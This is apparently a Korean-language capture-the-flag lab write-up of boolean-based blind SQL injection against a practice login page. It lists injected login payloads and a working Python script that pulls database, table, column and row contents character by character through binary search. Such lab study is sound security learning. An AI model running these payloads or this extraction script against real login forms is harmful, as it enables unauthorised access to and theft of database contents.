SQL injection 가능한지 판단
' and '1' = '1 포함해서 로그인
-> 주어진것 => ID: normaltic PW: 1234
-> True(1=1)와 False(1=2)구분되어야함
-> True(1=1) 값을 넣었지만 False나옴
-> 불가능
| normaltic' and '1' = '1 | Result(True) |
|---|
 |  |
| normaltic' and '1' = '2 | Result(False) |
|---|
 |  |
normaltic' and (1=1) and '1' = '1포함하여 로그인
-> 함수를 넣을 수 있는지 추가적인 확인
-> True False 테스트
-> (1=1) -> (1=2) 바꿔서 로그인시도
| normaltic' and (1=1) and '1' = '1 | Result(True) |
|---|
 |  |
| normaltic' and (1=2) and '1' = '1 | Result(False) |
|---|
 |  |
|
필터링테스트
((select 'test')='test') 넣어서 로그인
-> ((select 'test')='test')는 True
-> 로그인 된다면 select필터링 x
| normaltic' and ((select 'test')='test') and '1' = '1 | Result(True) |
|---|
 |  |
함수넣어서 확인
substr() 넣어서 테스트
-> normaltic' and (substr(('test'),1,1)='t') and '1' 로그인
| normaltic' and (substr(('test'),1,1)='t') and '1' = '1 | Result |
|---|
 |  |
Burp Sutie으로 True False차이 확인
| True(normaltic' and (1=1) and '1' = '1) |
|---|
 |
| False(normaltic' and (1=2) and '1' = '1) |
|---|
 |
- python으로 request 모듈을 이용해서 post방식으로 보내는 테스트
- keyword는 False인 상황에서만 나오는 단어로 설정
- Success나오면 성공
import requests
url="http://ctf.segfaulthub.com:7777/sqli_3/login.php"
while True:
data={
'UserId' : "normaltic' and (ascii(substr((select database()),1,1))>0) and '1' = '1",
'Password' : '1234',
'Submit' : 'Login'
}
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
}
response=requests.post(url,data=data,headers=header)
keyword="Warning!"
if keyword in response.text:
print("Fail")
break
else:
print("Success")
break
import requests
url="http://ctf.segfaulthub.com:7777/sqli_3/login.php"
cho= input("1: Database 2: Table 3: Column 4: Extract ")
if(cho == "1"):
ice="select database()"
elif(cho == "2"):
DB=input("DB_Name: ")
tc="table"
ice=f"select {tc}_name from information_schema.{tc}s where table_schema = '{DB}'"
elif(cho == "3"):
DB=input("DB_Name: ")
tc="column"
ice=f"select {tc}_name from information_schema.{tc}s where table_schema = '{DB}'"
elif(cho == "4"):
Table=input("Table_Name: ")
Col=input("Column_Name: ")
ice=f"select {Col} from {Table}"
limit_num = 0
list = []
while True:
data={
'UserId' : f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),1,1))>0) and '1' = '1",
'Password' : '1234',
'Submit' : 'Login'
}
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
}
response=requests.post(url,data=data,headers=header)
keyword="Warning!"
if keyword in response.text:
print("갯수: " + str(limit_num))
break
digit_num=1
while True:
data={
'UserId' : f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),{digit_num},1))>0) and '1' = '1",
'Password' : '1234',
'Submit' : 'Login'
}
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
}
response=requests.post(url,data=data,headers=header)
keyword="Warning!"
if keyword in response.text:
print("자릿수: " + str(digit_num))
res=''
for i in list:
res = res + chr(i)
print(list)
print(">"+str(res))
list=[]
break
start =32
end=127
while start <= end:
mid=round((start + end)/2)
data={
'UserId' : f"normaltic' and (ascii(substr(({ice} limit {limit_num},1),{digit_num},1))>{mid}) and '1' = '1",
'Password' : '1234',
'Submit' : 'Login'
}
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36',
'Cookie': 'PHPSESSID=etm5c06rr53pc2js0gemnsi097'
}
response=requests.post(url,data=data,headers=header)
keyword="Warning!"
if keyword in response.text:
end = mid - 1
# start = mid + 1
# print("up")
g=1
else:
start = mid + 1
# end = mid - 1
# print("Down")
g=2
if(g==1):
list.append(mid)
else:
list.append(mid+1)
digit_num += 1
limit_num += 1
print("Done")
| DB_NAME |
|---|
 |
| Table_Name & Column_Name |
|---|
 |
| Extract |
|---|
 |
